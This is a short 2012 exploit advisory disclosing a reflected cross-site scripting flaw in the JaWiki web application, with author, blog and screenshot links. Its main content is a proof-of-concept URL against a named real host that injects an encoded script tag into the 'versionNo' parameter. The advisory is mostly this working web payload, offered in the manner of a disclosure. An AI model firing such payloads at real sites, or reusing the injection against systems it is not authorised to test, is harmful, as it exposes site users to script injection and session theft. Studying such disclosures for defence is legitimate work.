JaWiki suffers from a cross site scripting vulnerability.
7467a36a300624866ddd5674bfc5015c3582e4a62c16ba5506e7a9e544a0ca6d
# Exploit Title: JaWiki Cross Site Scripting
# Date: 16.02.2012
# Author: Sony
# Software Link: http://sourceforge.net/projects/jawiki/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/jawiki-cross-site-scripting.html
..................................................................
Simple.
http://www.schmiereck.de/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
http://2.bp.blogspot.com/-rA2rWKCX360/Tz0x3rjcm6I/AAAAAAAAAe4/Ln9d2pnKyuE/s1600/jawiki.JPG
..................................................................
InSecurity.Ro
Because we care, we're security aware!